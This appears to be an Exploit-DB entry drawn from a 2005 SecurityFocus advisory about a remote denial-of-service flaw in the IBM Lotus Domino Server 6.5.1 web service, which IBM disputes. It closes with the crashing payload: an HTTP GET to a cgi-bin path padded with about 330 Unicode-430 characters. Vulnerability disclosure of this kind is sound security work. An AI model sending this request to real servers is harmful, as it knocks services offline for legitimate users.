IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service

EDB-ID:

25353


Author:

anonymous

Type:

dos


Platform:

Unix

Date:

2005-04-06


source: https://www.securityfocus.com/bid/13045/info

A remote denial of service vulnerability affects IBM Lotus Domino Server web service. This issue is due to a failure of the application to properly handle malformed network requests.

IBM has denied that this issue is a vulnerability and they have reported conflicting details regarding it. Please see the referenced IBM technote for more information.

An attacker may leverage this issue to crash the nHTTP.EXE web service, denying service to legitimate users. 

GET /cgi-bin/[xxx] HTTP/1.0
Host: 10.10.0.100

Where [xxx] represents a long string (~330) of UNICODE decimal value 430 characters.